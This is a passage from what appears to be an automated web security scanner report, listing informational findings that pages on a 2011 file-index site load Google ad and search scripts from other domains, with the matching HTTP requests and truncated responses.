  • http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/FreeBSD/distfiles/Other/aub-2.1.3.tar.gz.55334.html HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:03:23 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "3AEFmKo5VIqWSbFfF/jTWA"
Content-Length: 21547
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:03:23 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 217
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub</title>
</head>
<body class=
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&amp;lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.74. http://dir.filewatcher.com/d/OpenBSD.0.0.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dir.filewatcher.com
Path:   /d/OpenBSD.0.0.htm

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/OpenBSD.0.0.htm HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:03:05 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "0125ABiqiU2WwPMCks8RyA"
Content-Length: 5858
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:03:05 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 190
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>/OpenBSD/</title>
</head>
<body
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&amp;lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.75. http://dir.filewatcher.com/d/OpenBSD/3.3/alpha/aub-2.0.5.tgz.32295.html/x22

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dir.filewatcher.com
Path:   /d/OpenBSD/3.3/alpha/aub-2.0.5.tgz.32295.html/x22

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/OpenBSD/3.3/alpha/aub-2.0.5.tgz.32295.html/x22 HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Mon, 24 Jan 2011 15:02:15 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "ftZg8Suarl4gLJMGsEwksg"
Content-Length: 3557
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:02:15 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 155
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title></title>
</head>
<body class="nb
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&amp;lang=en"></script>
...[SNIP]...

21.76. http://dir.filewatcher.com/d/OpenBSD/3.4.0.0.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dir.filewatcher.com
Path:   /d/OpenBSD/3.4.0.0.htm

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/OpenBSD/3.4.0.0.htm HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:02:32 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "zBx1lJs1lrKjfifjT/ynag"
Content-Length: 5125
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:02:32 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 154
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>/OpenBSD/3.4/</title>
</head>
<b
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&amp;lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.77. http://dir.filewatcher.com/d/OpenBSD/3.4/i386.0.0.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dir.filewatcher.com
Path:   /d/OpenBSD/3.4/i386.0.0.htm

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/OpenBSD/3.4/i386.0.0.htm HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:02:29 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "8ZwpAnkk2M+ybZNTCiDGfg"
Content-Length: 14652
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:02:29 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 154
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>/OpenBSD/3.4/i386/</title>
</hea
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&amp;lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.78. http://dir.filewatcher.com/d/OpenBSD/3.4/i386/aub-2.0.5.tgz.32469.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dir.filewatcher.com
Path:   /d/OpenBSD/3.4/i386/aub-2.0.5.tgz.32469.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/OpenBSD/3.4/i386/aub-2.0.5.tgz.32469.html HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:02:28 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "cKdin3ZdqrGl07/9m4nYyA"
Content-Length: 21147
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:02:28 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 155
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub - assemble usenet binaries</
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&amp;lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.79. http://dir.filewatcher.com/d/OpenBSD/3.4/sparc.0.0.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dir.filewatcher.com
Path:   /d/OpenBSD/3.4/sparc.0.0.htm

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/OpenBSD/3.4/sparc.0.0.htm HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:02:31 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "Mk8kdpEebSex7glduf1ExA"
Content-Length: 14692
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:02:31 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 154
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>/OpenBSD/3.4/sparc/</title>
</he
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&amp;lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.80. http://dir.filewatcher.com/d/OpenBSD/3.4/sparc/aub-2.0.5.tgz.32468.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dir.filewatcher.com
Path:   /d/OpenBSD/3.4/sparc/aub-2.0.5.tgz.32468.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/OpenBSD/3.4/sparc/aub-2.0.5.tgz.32468.html HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:02:30 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "GJWxiO1o71UMYTNBAno0Ig"
Content-Length: 22842
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:02:30 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 154
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub - assemble usenet binaries</
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&amp;lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.81. http://dir.filewatcher.com/d/OpenBSD/3.4/sparc64.0.0.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dir.filewatcher.com
Path:   /d/OpenBSD/3.4/sparc64.0.0.htm

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/OpenBSD/3.4/sparc64.0.0.htm HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:02:27 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "kltTuv6qQh686aT3VA8jow"
Content-Length: 14713
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:02:27 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 154
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>/OpenBSD/3.4/sparc64/</title>
</
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&amp;lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.82. http://dir.filewatcher.com/d/OpenBSD/3.4/sparc64/aub-2.0.5.tgz.32472.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dir.filewatcher.com
Path:   /d/OpenBSD/3.4/sparc64/aub-2.0.5.tgz.32472.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/OpenBSD/3.4/sparc64/aub-2.0.5.tgz.32472.html HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:02:26 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "HN2mrHKKSLPiqeLdDv7xng"
Content-Length: 22236
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:02:26 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 154
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub - assemble usenet binaries</
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&amp;lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.83. http://dir.filewatcher.com/d/OpenBSD/3.7.0.0.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dir.filewatcher.com
Path:   /d/OpenBSD/3.7.0.0.htm

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/OpenBSD/3.7.0.0.htm HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:03:05 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "ldW7RoPSMM32AzKOlfWm+Q"
Content-Length: 5526
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:03:05 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 188
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>/OpenBSD/3.7/</title>
</head>
<b
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&amp;lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.84. http://dir.filewatcher.com/d/OpenBSD/3.7/powerpc.0.0.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dir.filewatcher.com
Path:   /d/OpenBSD/3.7/powerpc.0.0.htm

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/OpenBSD/3.7/powerpc.0.0.htm HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:03:03 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "B6QYo4Llf6naoT3+82bBXw"
Content-Length: 15072
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:03:03 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 189
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>/OpenBSD/3.7/powerpc/</title>
</
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&amp;lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.85. http://dir.filewatcher.com/d/OpenBSD/3.7/powerpc/aub-2.0.5.tgz.32553.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dir.filewatcher.com
Path:   /d/OpenBSD/3.7/powerpc/aub-2.0.5.tgz.32553.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/OpenBSD/3.7/powerpc/aub-2.0.5.tgz.32553.html HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:03:02 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "QSjIlz4mHeQV6tMXgQ6s4Q"
Content-Length: 19360
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:03:02 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 186
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub - assemble usenet binaries</
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&amp;lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.86. http://dir.filewatcher.com/d/OpenBSD/3.9.0.0.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dir.filewatcher.com
Path:   /d/OpenBSD/3.9.0.0.htm

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/OpenBSD/3.9.0.0.htm HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:03:01 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "SmKJOP6YWZiQzZkYVkcEZA"
Content-Length: 5427
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:03:01 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 187
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>/OpenBSD/3.9/</title>
</head>
<b
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&amp;lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.87. http://dir.filewatcher.com/d/OpenBSD/3.9/sparc.0.0.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dir.filewatcher.com
Path:   /d/OpenBSD/3.9/sparc.0.0.htm

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/OpenBSD/3.9/sparc.0.0.htm HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:03:01 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "5ZcKE6J1sYIm0tnEAXPF0w"
Content-Length: 13057
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:03:01 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 185
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>/OpenBSD/3.9/sparc/</title>
</he
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&amp;lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.88. http://dir.filewatcher.com/d/OpenBSD/3.9/sparc/aub-2.0.5.tgz.32478.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dir.filewatcher.com
Path:   /d/OpenBSD/3.9/sparc/aub-2.0.5.tgz.32478.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/OpenBSD/3.9/sparc/aub-2.0.5.tgz.32478.html HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:03:00 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "rXctGE9ZuJqH+Fb906+BLQ"
Content-Length: 19463
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:03:00 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 174
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub</title>
</head>
<body class=
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&amp;lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.89. http://dir.filewatcher.com/d/OpenBSD/4.0.0.0.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dir.filewatcher.com
Path:   /d/OpenBSD/4.0.0.0.htm

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/OpenBSD/4.0.0.0.htm HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:02:54 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "QHA8A2E3P01GvGdLle7K0A"
Content-Length: 5427
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:02:54 GMT
Vary: Accept-Encoding
